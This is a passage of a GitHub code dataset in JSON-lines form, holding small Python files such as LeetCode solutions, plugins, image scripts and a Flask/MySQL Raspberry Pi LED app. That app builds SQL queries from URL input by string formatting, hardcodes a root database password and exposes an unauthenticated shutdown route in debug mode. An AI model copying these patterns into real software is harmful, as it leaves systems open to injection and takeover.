n\n for a, i in sorted([a, i] for i, a in enumerate(arr)):\n j = i - 1\n while j >= 0 and arr[j] < arr[i] and i - j <= d:\n dp[i] = max(dp[i], dp[j] + 1)\n j -= 1\n j = i + 1\n while j < n and arr[j] < arr[i] and j - i <= d:\n dp[i] = max(dp[i], dp[j] + 1)\n j += 1\n return max(dp)","repo_name":"LikunOuyang/Leetcode","sub_path":"Weekly Contest/5331_JumpGameV.py","file_name":"5331_JumpGameV.py","file_ext":"py","file_size_in_byte":580,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"29232404439","text":"class Solution:\n def PredictTheWinner(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: bool\n \"\"\"\n def range_sum(i, j):\n if i == 0: \n return pre_sum[j]\n else:\n return pre_sum[j] - pre_sum[i-1]\n\n n = len(nums)\n dp = [[0] * n for i in range(n)]\n \n pre_sum = [0] * n\n pre_sum[0] = nums[0]\n for i in range(1, n):\n pre_sum[i] = pre_sum[i-1] + nums[i]\n \n for i in range(n):\n dp[i][i] = nums[i]\n for j in range(1, n):\n for i in range(n):\n if i + j >= n: break\n dp[i][i+j] = max(nums[i] + range_sum(i+1, i+j) - dp[i+1][i+j], nums[i+j] + range_sum(i, i+j-1) - dp[i][i+j-1])\n \n if dp[0][-1] * 2 >= pre_sum[-1]:\n return True\n else:\n return False","repo_name":"YiqunPeng/Leetcode-pyq","sub_path":"solutions/486PredictTheWinner.py","file_name":"486PredictTheWinner.py","file_ext":"py","file_size_in_byte":893,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"5562551062","text":"import pygame\r\ndef button(board):\r\n color = (255,0,0)\r\n x = 310\r\n y = 780\r\n width = 150\r\n height = 50\r\n text = \"RESET\"\r\n pygame.draw.rect(board,(0,0,0), (x-2,y-2,width+4,height+4),5) \r\n pygame.draw.rect(board, color, (x,y,width,height),0)\r\n font = pygame.font.SysFont('comicsans',60)\r\n text = font.render(text,1,(0,0,0))\r\n board.blit(text,(x + (width/2 - text.get_width()/2), y + (height/2 - text.get_height()/2)))\r\n \r\n","repo_name":"lalith-krg/OXes","sub_path":"button.py","file_name":"button.py","file_ext":"py","file_size_in_byte":506,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"83"} +{"seq_id":"980184487","text":"# -*- coding: utf-8 -*-\n\nfrom odoo import api, fields, models, _\n# from mock import DEFAULT\nfrom datetime import datetime, timedelta\nfrom dateutil.relativedelta import relativedelta\nfrom odoo.exceptions import UserError, ValidationError\nimport hashlib\nimport time\nfrom odoo.exceptions import Warning\nimport json\n\n\nclass Diagnosis(models.Model):\n _name = 'diagnosis'\n _rec_name = 'code'\n \n code = fields.Char('Code', required=True)\n description = fields.Text('Description', required=True)\n\n @api.multi\n @api.depends('code', 'description')\n def name_get(self):\n result = []\n for rcd in self:\n name = rcd.code or ''\n if rcd.description:\n name += '/' + rcd.description\n result.append((rcd.id, name))\n return result\n\n @api.model\n def get_all_records(self):\n diagnosis_obj=self.env['diagnosis'].search_read([])\n return diagnosis_obj\n\n @api.multi\n def get_dignosis_description(self):\n return str(self.description)\n","repo_name":"Jeisonpernia/dental","sub_path":"pragtech_dental_management/models/diagnosis.py","file_name":"diagnosis.py","file_ext":"py","file_size_in_byte":1033,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"21875794968","text":"from .requirements import get_requirement_handler\nfrom .effects import get_effect_handler\nfrom ...defcon.conditional import Conditional\n\nclass ConditionalFactory:\n\n def __init__(self, tree):\n\n self.conditional = Conditional()\n\n #print(\"Conditional tree: \" + tree.toStringTree())\n\n in_else = False\n\n for child in tree.getChildren():\n label = child.text\n\n if label == \"REQUIREMENTS\":\n self.add_requirements(child)\n elif label == \"EFFECTS\" and not in_else:\n self.add_effects(child)\n elif label == \"CONDITIONAL\":\n self.conditional.elseif_ = ConditionalFactory(child).get_conditional()\n elif label == \"else\":\n in_else = True\n elif label == \"EFFECTS\" and in_else:\n self.add_else_effects(child)\n\n def add_requirements(self, tree):\n '''Adds the requirements described by the given tree'''\n\n for r in tree.getChildren():\n if r.text == \"&\":\n continue\n req = get_requirement_handler(r)\n if req:\n self.conditional.requirements.append(req)\n\n def add_effects(self, tree):\n '''Adds the 'if' effects described by the given tree'''\n\n for e in tree.getChildren():\n effect = get_effect_handler(e)\n if effect:\n self.conditional.effects.append(effect)\n\n def add_else_effects(self, tree):\n '''Adds the 'else' effects described by the given tree'''\n\n for e in tree.getChildren():\n # Use an effects factory to get build the effect\n #effect = Effect_factory(e).get_effect()\n effect = get_effect_handler(e)\n if effect:\n self.conditional.else_effects.append(effect)\n\n def get_conditional(self):\n return self.conditional\n","repo_name":"AgentsUnited/daf","sub_path":"daf-core/modules/dgep/src/dgdl/factories/conditional_factory.py","file_name":"conditional_factory.py","file_ext":"py","file_size_in_byte":1885,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"83"} +{"seq_id":"70770058832","text":"\"\"\"\nPatch ranger.gui.widgets.view_miller.ViewMiller\n\n\"\"\"\n\nimport curses\nfrom ranger.gui.widgets.view_miller import ViewBase\nfrom ranger.gui.widgets.view_miller import ViewMiller\n\n\ndef enhance_draw_border(attr):\n \"\"\"\n Call by draw_border, fix ViewMiller can't draw border properly.\n\n :param attr int: attribute of curses\n \"\"\"\n\n _replace_resize()\n _wrap_draw_border(attr)\n\n\ndef _replace_resize():\n \"\"\"\n can replace resize by below code, but it's slow for startup.\n # code = textwrap.dedent(inspect.getsource(ViewMiller.resize))\n # code = code.replace('def resize', 'def view_miller_resize')\n # code = code.replace('left = pad', 'left = 0')\n # code = code.replace('wid = int(self.wid - left + 1 - pad)',\n # 'wid = int(self.wid - left + 1)')\n\n # wrapped_module = inspect.getmodule(ViewMiller)\n # exec(code, wrapped_module.__dict__) # pylint: disable=exec-used\n # ViewMiller.resize = wrapped_module.view_miller_resize\n \"\"\"\n\n def resize(self, y, x, hei=None, wid=None): # pylint: disable=invalid-name\n \"\"\"Resize all the columns according to the given ratio\"\"\"\n ViewBase.resize(self, y, x, hei, wid)\n\n border_type = self.settings.draw_borders.lower()\n if border_type in ['outline', 'both', 'true']:\n pad = 1\n else:\n pad = 0\n left = 0\n self.is_collapsed = self._collapse() # pylint: disable=protected-access\n if self.is_collapsed:\n generator = enumerate(self.stretch_ratios)\n else:\n generator = enumerate(self.ratios)\n\n last_i = len(self.ratios) - 1\n\n for i, ratio in generator:\n wid = int(ratio * self.wid)\n\n cut_off = self.is_collapsed and not self.settings.padding_right\n if i == last_i:\n if not cut_off:\n wid = int(self.wid - left + 1)\n else:\n self.columns[i].resize(pad, max(0, left - 1), hei - pad * 2, 1)\n self.columns[i].visible = False\n continue\n\n if i == last_i - 1:\n self.pager.resize(pad, left, hei - pad * 2, max(1, self.wid - left - pad))\n\n if cut_off:\n self.columns[i].resize(pad, left, hei - pad * 2, max(1, self.wid - left - pad))\n continue\n\n try:\n self.columns[i].resize(pad, left, hei - pad * 2, max(1, wid - 1))\n except KeyError:\n pass\n\n left += wid\n\n ViewMiller.resize = resize\n\n\ndef _wrap_draw_border(attr):\n def draw_border(self, border_types):\n self.win.attrset(attr)\n if 'outline' in border_types:\n try:\n self.win.hline(0, 0, curses.ACS_HLINE, self.wid)\n self.win.hline(self.hei - 1, 0, curses.ACS_HLINE, self.wid)\n y, x = self.win.getparyx() # pylint: disable=invalid-name\n self.parent.addch(y, 0, curses.ACS_LTEE)\n self.parent.addch(y, self.wid + 1, curses.ACS_RTEE)\n self.parent.addch(y + self.hei - 1, 0, curses.ACS_LTEE)\n self.parent.addch(y + self.hei - 1, self.wid + 1, curses.ACS_RTEE)\n except curses.error:\n pass\n\n if 'separators' in border_types:\n for child in self.columns[:-1]:\n if not child.has_preview():\n continue\n if child.main_column and self.pager.visible:\n break\n y, x = self.hei - 1, child.x + child.wid - 1 # pylint: disable=invalid-name\n try:\n self.win.vline(1, x, curses.ACS_VLINE, y - 1)\n if 'outline' in border_types:\n self.addch(0, x, curses.ACS_TTEE, 0)\n self.addch(y, x, curses.ACS_BTEE, 0)\n else:\n self.addch(0, x, curses.ACS_VLINE, 0)\n self.addch(y, x, curses.ACS_VLINE, 0)\n except curses.error:\n pass\n\n ViewMiller._draw_borders = draw_border # pylint: disable=protected-access\n","repo_name":"kevinhwang91/rnvimr","sub_path":"ranger/plugins/patch/viewmiller.py","file_name":"viewmiller.py","file_ext":"py","file_size_in_byte":4179,"program_lang":"python","lang":"en","doc_type":"code","stars":730,"dataset":"github-code","pt":"83"} +{"seq_id":"20777543367","text":"\"\"\"实现图像信息的直方图统计\"\"\"\n\nimport os\nimport cv2\nfrom matplotlib import pyplot as plt\n\n\ndef show_RGB_sum_distribution(filepath_image: str) -> None:\n \"\"\"统计RGB三通道的灰度值分布的累加\"\"\"\n if os.path.isfile(filepath_image):\n img = cv2.imread(filepath_image)\n plt.hist(img.reshape([-1]), 256, [0, 256])\n plt.show()\n else:\n raise ValueError(\"给定路径'{}'不是一个文件\".format(filepath_image))\n\n\ndef show_RGB_each_distribution(filepath_image: str) -> None:\n \"\"\"统计RGB三通道各自的灰度值分布\"\"\"\n if os.path.isfile(filepath_image):\n img = cv2.imread(filepath_image)\n color = (\"r\", \"g\", \"b\")\n for i, col in enumerate(color):\n histr = cv2.calcHist([img], [i], None, [256], [0, 256])\n plt.plot(histr, color=col)\n plt.xlim([0, 256])\n plt.show()\n else:\n raise ValueError(\"给定路径'{}'不是一个文件\".format(filepath_image))\n\n\nif __name__ == \"__main__\":\n filepath_spongebob_img = (\n \"./Chapter1_PythonBasic/Lab3_FigureStatistics/data/images/SpongeBob.png\"\n )\n show_RGB_sum_distribution(filepath_spongebob_img)\n show_RGB_each_distribution(filepath_spongebob_img)\n pass\n","repo_name":"Chaclie/BaiduPaddleAI","sub_path":"Chapter1_PythonBasic/Lab3_FigureStatistics/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1252,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"29738387900","text":"\"\"\"\n @Time : 2018-10-28 00:09\n @Author : TaylorMei\n @Email : mhy845879017@gmail.com\n \n @Project : Mirror-Segmentation\n @File : edge.py\n @Function: \n \n\"\"\"\n\nimport os\nimport numpy as np\nimport cv2\nfrom PIL import Image\n\n# DATA_DIR = \"/home/iccd/Mirror-Segmentation/data_640/val\"\nDATA_DIR = \"/root/data_640/train\"\nIMAGE_DIR = os.path.join(DATA_DIR, \"image\")\n\nimglist = os.listdir(IMAGE_DIR)\nprint(\"Total {} masks will be extracted edge!\".format(len(imglist)))\n\nq = 0\nfor imgname in imglist:\n q += 1\n mask_path = DATA_DIR + \"/mask/\" + imgname[:-4] + \"_json/label8.png\"\n edge_path = DATA_DIR + \"/mask/\" + imgname[:-4] + \"_json/edge.png\"\n\n mask = Image.open(mask_path)\n num_obj = np.max(mask)\n\n width, height = mask.size\n gt_mask = np.zeros([height, width, 1], dtype=np.uint8)\n for index in range(num_obj):\n for i in range(width):\n for j in range(height):\n at_pixel = mask.getpixel((i, j))\n if at_pixel == index + 1:\n gt_mask[j, i, 0] = 255\n\n edge = cv2.Canny(gt_mask, 0, 255)\n edge = np.where(edge != 0, 255, 0).astype(np.uint8)\n\n cv2.imwrite(edge_path, edge)\n print(\"{} {}\".format(q, edge_path))\n","repo_name":"Mhaiyang/Mirror-Segmentation","sub_path":"tools/edge.py","file_name":"edge.py","file_ext":"py","file_size_in_byte":1213,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"83"} +{"seq_id":"22034889719","text":"from LinkedLists import Link\n\n# Question 1\n# link = Link(1000)\n# print(link.first)\n# print(link.rest is Link.empty)\n# link = Link(1000, 2000)\n# # link = Link(1000, Link()) -> error\n# link = Link(1, Link(2, Link(3)))\n# print(link.first)\n# print(link.rest.first)\n# print(link.rest.rest.rest is Link.empty)\n# link.first = 9001\n# print(link.first)\n# link.rest = link.rest.rest\n# print(link.rest.first)\n# link = Link(1)\n# link.rest = link\n# print(link.rest.rest.rest.rest.first)\n\n\n# Question 2\n\ndef insert_front(linked_list, new_val):\n \"\"\"Inserts NEW_VAl in front of LINKED_LIST, returning new linked list.\"\"\"\n return Link(new_val, linked_list)\n\n\ndef reverse_link(lnk):\n ret_list = Link.empty\n if lnk.rest == Link.empty:\n ret_list = lnk\n return ret_list\n while lnk.rest is not Link.empty:\n new_val = lnk\n ret_list = insert_front(ret_list, new_val)\n lnk = lnk.rest\n return ret_list\n\n\ns = Link(1, Link(2, Link(3, Link.empty)))\nprint(\"Returned list is \" + reverse_link(s).__str__())\n","repo_name":"LakshyaShrivastava/LearningPython","sub_path":"oldLectureAssignments/Lab7.py","file_name":"Lab7.py","file_ext":"py","file_size_in_byte":1028,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"2966009730","text":"import feedparser\n\ndef news (rss):\n\tNewsFeed = feedparser.parse(rss)\n\tNewsFeed = NewsFeed.entries\n\ta = NewsFeed[0]\n\ttitle = a.title\n\tsummary =a.summary\n\tlink =a.link\n\tpub=a.published\n\tn = \"======---->>>>>>>>><<<<<<<<<<----========\"\n\tnews = (title,link)\n\treturn str(news)\n\tprint(news)\n","repo_name":"moein805/News_telebot","sub_path":"feed.py","file_name":"feed.py","file_ext":"py","file_size_in_byte":284,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"10819916566","text":"# Great discussion about shoving metadata into people's faces:\n# https://stackoverflow.com/questions/1523427/what-is-the-common-header-format-of-python-files\n\n# FIT2085 requires two main elements to be present before import statements\n# \"\"\"Docstring module as an overview of the file\"\"\"\n# __author__ variable that indicates the author\n\n# https://docs.python.org/3/library/typing.html#typing.TypeVar\n# Can't really find comprehensive information on TypeVar\n\nfrom typing import TypeVar\n\nT = TypeVar(\"T\", int, str)\n\n\ndef get_element(x: int, y: int):\n a = [0, 1, 2, 0, 1, 2, 0, 1, 2]\n b = [1, 2, 3, 4, 5, 6, 7, 8, 9, 0]\n c = \"Almost done!\"\n d = [a, b, c]\n\n return d[x][y]\n\n\nprint(\"get_element(0, 4): \" + str(get_element(0, 4)))\nprint(\"get_element(1, 9): \" + str(get_element(1, 9)))\nprint(\"get_element(2, -1): \" + str(get_element(2, -1)))\n","repo_name":"randcyp/FIT2085","sub_path":"Tutorial 1/Exercise 5.py","file_name":"Exercise 5.py","file_ext":"py","file_size_in_byte":849,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"17591706347","text":"functions = [\"plain\", \"bold\", \"italic\", \"header\", \"link\", \"inline-code\", \"new-line\", \"ordered-list\", \"unordered-list\"]\ncommands = [\"!help\", \"!done\"]\noutput = []\n\nwhile True:\n while True:\n command = input(\"Choose a formatter: \")\n if command in (*functions, *commands):\n break\n else:\n print(\"Unknown formatting type or command\")\n if command == \"!help\":\n print(f\"Available formatters: {' '.join(functions)}\")\n print(f\"Special commands: {' '.join(commands)}\")\n elif command == \"!done\":\n break\n elif command == \"header\":\n while True:\n header_level = int(input(\"Level: \"))\n if header_level not in range(1, 7):\n print(\"The level should be within the range of 1 to 6\")\n else:\n break\n text = input(\"Text: \")\n output.append(\"#\" * header_level + \" \" + text + \"\\n\")\n elif command in (\"plain\", \"bold\", \"italic\", \"inline-code\"):\n text = input(\"Text: \")\n if command == \"plain\":\n output.append(text)\n elif command == \"bold\":\n output.append(\"**\" + text + \"**\")\n elif command == \"italic\":\n output.append(\"*\" + text + \"*\")\n else:\n output.append(\"`\" + text + \"`\")\n elif command == \"new-line\":\n output.append(\"\\n\")\n elif command == \"link\":\n label = input(\"Label: \")\n link = input(\"URL: \")\n output.append(f\"[{label}]({link})\")\n elif command in (\"ordered-list\", \"unordered-list\"):\n while True:\n rows = int(input(\"Number of rows: \"))\n if rows > 0:\n break\n print(\"The number of rows should be greater than zero\")\n output.extend([f\"{index}. {input(f'Row #{index}: ') }\\n\"\n if command == \"ordered-list\" else f\"* {input(f'Row #{index}: ')}\\n\"\n for index in range(1, rows + 1)])\n print(\"\".join(output))\n\nwith open(\"output.md\", \"wt\") as file:\n file.write(\"\".join(output))\n","repo_name":"BigIron01/learning_python","sub_path":"markdown_generator.py","file_name":"markdown_generator.py","file_ext":"py","file_size_in_byte":2033,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"18651265236","text":"from string import ascii_lowercase\n\n\ndef mix(s1, s2):\n c1 = [s1.count(ascii_lowercase[i]) for i in range(0, 26)]\n c2 = [s2.count(ascii_lowercase[i]) for i in range(0, 26)]\n m = [max(c1[i], c2[i]) for i in range(0,26)]\n strings = []\n for i in range(0, 26):\n if m[i] > 1:\n prefix = [\"2\", \"1\"][m[i] == c1[i]]\n prefix = [prefix, \"=\"][c1[i] == c2[i]]\n strings.append(prefix + \":\" + ascii_lowercase[i] * m[i])\n\n return \"/\".join(sorted(strings, key = lambda x : (-len(x), x)))\n\n\nif __name__ == \"__main__\":\n assert mix(\"Are they here\", \"yes, they are here\") == \"2:eeeee/2:yy/=:hh/=:rr\"\n assert mix(\"looping is fun but dangerous\", \"less dangerous than coding\") == \\\n \"1:ooo/1:uuu/2:sss/=:nnn/1:ii/2:aa/2:dd/2:ee/=:gg\"\n assert mix(\" In many languages\", \" there's a pair of functions\") == \\\n \"1:aaa/1:nnn/1:gg/2:ee/2:ff/2:ii/2:oo/2:rr/2:ss/2:tt\"\n assert mix(\"Lords of the Fallen\", \"gamekult\") == \"1:ee/1:ll/1:oo\"\n assert mix(\"codewars\", \"codewars\") == \"\"\n assert mix(\"A generation must confront the looming \", \"codewarrs\") == \\\n \"1:nnnnn/1:ooooo/1:tttt/1:eee/1:gg/1:ii/1:mm/=:rr\"\n","repo_name":"ladamalina/codewars-2019-python","sub_path":"Strings Mix/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1166,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"28041094902","text":"class HistoricalData:\n def __init__(self, id, symbolid, opendate, opener, closer,\n high, low, volume, uopener, ucloser, uhigh, ulow,\n uvolume, change, changepercent, label, createdon):\n self.id = id\n self.symbolid = symbolid\n self.opendate = opendate\n self.opener = opener\n self.closer = closer\n self.high = high\n self.low = low\n self.volume = volume\n self.uopener = uopener\n self.ucloser = ucloser\n self.uhigh = uhigh\n self.ulow = ulow\n self.uvolume = uvolume\n self.change = change\n self.changepercent = changepercent\n self.label = label\n self.createdon = createdon\n\n def __enter__(self):\n return self\n\n def createcommadelimitedvalueforinsert(self):\n retVal = \"\"\n retVal += \"'\" + self.symbolid + \"'\"\n retVal += \", '\" + self.opendate + \"'\"\n retVal += \",'\" + self.opener + \"'\"\n retVal += \",'\" + self.closer + \"'\"\n retVal += \",'\" + self.high + \"'\"\n retVal += \",'\" + self.low + \"'\"\n retVal += \",'\" + self.volume + \"'\"\n retVal += \",'\" + self.uopener + \"'\"\n retVal += \",'\" + self.ucloser + \"'\"\n retVal += \",'\" + self.uhigh + \"'\"\n retVal += \",'\" + self.ulow + \"'\"\n retVal += \",'\" + self.uvolume + \"'\"\n retVal += \",'\" + self.change + \"'\"\n retVal += \",'\" + self.changepercent + \"'\"\n retVal += \",\" + str(self.label) + \"\"\n retVal += \",'\" + self.createdon + \"'\"\n return retVal","repo_name":"persinac/stock_iex","sub_path":"classes/HistoricalData.py","file_name":"HistoricalData.py","file_ext":"py","file_size_in_byte":1573,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"32325643355","text":"# coding: utf-8\n\nimport MySQLdb\nfrom flask import Flask\nfrom flask import render_template\nfrom flask import request\nimport RPi.GPIO as GPIO\n\napp = Flask(__name__)\nGPIO.setmode(GPIO.BCM)\nleds = {\n 24 : {'name' : 'LED', 'state' : GPIO.LOW}\n}\n\nfor led in leds :\n GPIO.setup(led, GPIO.OUT)\n GPIO.output(led, GPIO.LOW)\n\ndef getGpioState():\n for led in leds :\n leds[led]['state'] = GPIO.input(led)\n return leds\n \ndef shutdown_server():\n func = request.environ.get('werkzeug.server.shutdown')\n if func is None:\n raise RuntimeError('Not running with the Werkzeug Server')\n func()\n\n@app.route('/shutdown') #http://192.168.1.111:8888/shutdown\ndef shutdown():\n shutdown_server()\n return 'Server shutting down..'\n\n@app.route('/insert')\ndef hello1():\n db=MySQLdb.connect(\"localhost\", \"root\", \"1234\", \"SCOTT\")\n cur = db.cursor()\n try:\n cur.execute(\"insert into EMP(empno,ename)value(333,'ddd')\")\n db.commit()\n return 'db data input oo'\n except:\n db.rollback()\n return 'db data nono'\n \n cur.close()\n db.close()\n@app.route('/delete')\ndef hello2():\n db=MySQLdb.connect(\"localhost\", \"root\", \"1234\", \"SCOTT\")\n cur = db.cursor()\n try:\n cur.execute(\"delete from EMP where empno=333\")\n db.commit()\n return 'db data delete oo'\n except:\n db.rollback()\n return 'db data delete nono'\n \n cur.close()\n db.close()\n@app.route('/create')\ndef hello3():\n db=MySQLdb.connect(\"localhost\", \"root\", \"1234\", \"SCOTT\")\n cur = db.cursor()\n try:\n cur.execute(\"create table KKAA(id int ,name char(20))\")\n cur.execute(\"insert into KKAA(id,name)value(1,'ddd')\")\n db.commit()\n return 'db data create oo'\n except:\n db.rollback()\n return 'db data create nono'\n \n cur.close()\n db.close()\n@app.route('/cre') #http://192.168.1.111:8888\ndef hello4():\n db = MySQLdb.connect(\"localhost\", \"root\", \"1234\", \"SCOTT\")\n cur = db.cursor()\n cur.execute(\"select * from KKAA\")\n row = cur.fetchall()\n\n templateData = {'data' : row} #row는 2차원 배열\n return render_template('test.html', **templateData)\n\n cur.close()\n db.close()\n\n \n@app.route('/') #http://192.168.1.111:8888\ndef hello():\n db = MySQLdb.connect(\"localhost\", \"root\", \"1234\", \"SCOTT\")\n cur = db.cursor()\n cur.execute(\"select empno, ename from EMP\")\n row = cur.fetchall()\n\n templateData = {'data' : row} #row는 2차원 배열\n #{'data':row{'empno' : value , 'ename' : value}}\n return render_template('test.html', **templateData)\n\n cur.close()\n db.close()\n \n@app.route('/select') #http://192.168.1.111:8888\ndef hello5():\n db = MySQLdb.connect(\"localhost\", \"root\", \"1234\", \"SCOTT\")\n cur = db.cursor()\n cur.execute(\"select * from EMP\")\n row = cur.fetchall()\n\n templateData = {'data' : row} #row는 2차원 배열\n #{'data':row{'empno' : value , 'ename' : value}}\n return render_template('test.html', **templateData)\n\n cur.close()\n db.close()\n@app.route('/select/') #http://192.168.1.111:8888\ndef hello6(num):\n db = MySQLdb.connect(\"localhost\", \"root\", \"1234\", \"SCOTT\")\n cur = db.cursor()\n cur.execute(\"select * from EMP where empno=%s\"%num)\n row = cur.fetchall()\n\n templateData = {'data' : row} #row는 2차원 배열\n #{'data':row{'empno' : value , 'ename' : value}}\n return render_template('test.html', **templateData)\n\n cur.close()\n db.close()\n@app.route(\"/led/on\")\ndef hello7():\n try:\n GPIO.output(24, GPIO.HIGH)\n return 'led on'\n except:\n return 'nononono'\n@app.route(\"/led/off\")\ndef hello8():\n try:\n GPIO.output(24, GPIO.LOW)\n return 'led off'\n except:\n return 'nononono'\n\n\n\n \nif __name__ == \"__main__\":\n app.run(host='0.0.0.0', port=8887, debug=True)\n\n\n\n\n\n\n\n","repo_name":"pensirara/github","sub_path":"webapp/MySQLdb_flask/mysqlflask3/mysqlflask3.py","file_name":"mysqlflask3.py","file_ext":"py","file_size_in_byte":4323,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"73218776270","text":"import math\n\n@staticmethod\ndef eratosthenes_sieve(N):\n\tprimes = []\n\n\tA = [True] * (N+1)\n\tsqrtN = math.floor( math.sqrt(N) )\n\n\tfor i in range(2, sqrtN + 1):\n\t\tif A[i]:\n\t\t\tj = 0\n\t\t\twhile i*i+j*i <= N:\n\t\t\t\tA[i*i+j*i] = False\n\t\t\t\tj = j + 1\n\n\tfor i in range(2,N+1):\n\t\tif A[i]:\n\t\t\tprimes.append(i)\n\n\treturn primes\n\nif __name__ == '__main__':\n\tresult = eratosthenes_sieve(100)\n\tprint(result)","repo_name":"jevanson/NumberSieves","sub_path":"EratosthenesSieve.py","file_name":"EratosthenesSieve.py","file_ext":"py","file_size_in_byte":384,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"24596361601","text":"from mrjob.job import MRJob as mrj\nimport json\nfrom scipy.spatial import ConvexHull\nimport heapq\n\n\nclass make_graph(mrj):\n '''\n construct vectors of containing relevant variables for every location\n '''\n\n def configure_options(self):\n '''\n pass additional arg to map reduce job\n '''\n super(make_graph,self).configure_options()\n self.add_file_option('--n')\n\n def mapper(self,_,line):\n \"\"\"\n takes in a line, seperate centre of homeogenous area\n from all the nodes, then makes hull of points to proxy for area\n \"\"\"\n line = line.strip('\\tnull\\n').replace('\"','')\n centre, nodes = line.split('|')\n\n cname, clon, clat = centre.split(',')\n\n points = []\n for n in nodes.split(';'):\n if n == '':\n continue\n nname, nlon, nlat = n.split(',')\n points.append((nlon,nlat))\n\n hull = ConvexHull(points)\n area = hull.volume\n yield cname, area\n\n def reducer_init(self):\n \"\"\"\n find top n with a heap\n \"\"\"\n self.n = int(self.options.n)\n self.h = []\n for i in range(self.n):\n self.h.append((-99999999999,-9999999999))\n heapq.heapify(self.h)\n\n def reducer(self, place, area):\n \"\"\"\n find top n with a heap\n \"\"\"\n min_count, min_n = self.h[0]\n\n l = list(area)\n assert len(l)==1\n area = l[0]\n\n if area > min_count:\n heapq.heapreplace(self.h, (area, place))\n\n def reducer_final(self):\n '''\n sorts and yields the heap self.h\n '''\n self.h.sort(reverse=True)\n for (area,place) in self.h:\n yield place, abs(area)\n\n\nif __name__ == \"__main__\":\n make_graph.run()\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"smahaffie/123project","sub_path":"analyzers/surfacearea.py","file_name":"surfacearea.py","file_ext":"py","file_size_in_byte":1810,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"18768871951","text":"from flask import Flask\n\n\ndef create_app() -> Flask:\n # Define Flask Application as app.\n app = Flask(__name__)\n \n # Load Configurations\n app.config['ENV'] = 'development'\n app.config['DEBUG'] = False\n app.config['TESTING'] = False\n\n # Initialize Blueprints\n initialize_blueprints(app)\n\n # Log Application Mode.\n print(\n f\"Application running in {app.config['ENV']} mode\"\n )\n # Return and start Flask application.\n return app\n\n\ndef initialize_blueprints(app: object) -> None:\n # Base Blueprints\n from base import (\n base_bp\n )\n app.register_blueprint(\n base_bp\n )\n # Recipe Blueprints\n from recipes import (\n recipes_bp\n )\n app.register_blueprint(\n recipes_bp\n )\n # System Blueprints\n from system import (\n system_bp\n )\n app.register_blueprint(\n system_bp\n )\n","repo_name":"Myothas/cookbook","sub_path":"src/application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":895,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"28891748141","text":"from numpy import log, exp, allclose, sqrt\nimport numpy as np\n\nfrom os.path import dirname, realpath, join\n\nfrom arspy.ars import adaptive_rejection_sampling\n\n\ndata_file = \"{}/ars_{{}}.npy\".format(\n join(dirname(realpath(__file__)), \"reference_data\", \"ars_data\")\n).format\n\n\ndef gaussian(x, sigma=1):\n return log(exp(-x ** 2 / sigma))\n\n\ndef half_gaussian(x, sigma=3):\n return log(exp(-x ** 2 / sigma)) * (1 * (x <= 0) + 1e300 * (x > 0))\n\n\ndef relativistic_momentum_logpdf(p, m=1., c=1.):\n return -m * c ** 2 * sqrt(p ** 2 / (m ** 2 * c ** 2) + 1)\n\n\ntests = {\n \"1d-gaussian\": {\"name\": \"1d-gaussian\",\n \"data\": data_file(\"gaussian\"),\n \"func\": gaussian,\n \"a\": -2, \"b\": 2,\n \"domain\": (float(\"-inf\"), float(\"inf\")),\n \"n_samples\": 20},\n \"1d-half-gaussian\": {\"name\": \"1d-half-gaussian\",\n \"data\": data_file(\"half_gaussian\"),\n \"func\": half_gaussian,\n \"a\": -2, \"b\": 0,\n \"domain\": [float(\"-inf\"), 0],\n \"n_samples\": 20},\n \"relativistic_monte_carlo_logpdf\": {\n \"name\": \"relativistic_momentum_logpdf\",\n \"data\": data_file(\"relativistic_logpdf\"),\n \"func\": relativistic_momentum_logpdf,\n \"a\": -10.0, \"b\": 10.0,\n \"domain\": [float(\"-inf\"), float(\"inf\")],\n \"n_samples\": 20\n }\n\n}\n\n\ndef _run(test_name):\n input_dict = tests[test_name]\n\n # name = input_dict[\"name\"]\n a = input_dict[\"a\"]\n b = input_dict[\"b\"]\n domain = input_dict[\"domain\"]\n n_samples = input_dict[\"n_samples\"]\n\n logpdf = input_dict[\"func\"]\n\n python_result = adaptive_rejection_sampling(\n logpdf=logpdf, a=a, b=b, domain=domain, n_samples=n_samples,\n random_stream=np.random.RandomState(seed=1)\n )\n\n # load old result computed by other implementation (julia)\n julia_result = np.load(input_dict[\"data\"])\n\n assert(allclose(julia_result, python_result, atol=3e-01))\n\n\ndef test_gaussian():\n _run(\"1d-gaussian\")\n\n\ndef test_half_gaussian():\n _run(\"1d-half-gaussian\")\n\n\ndef test_relativistic_monte_carlo_logpdf():\n 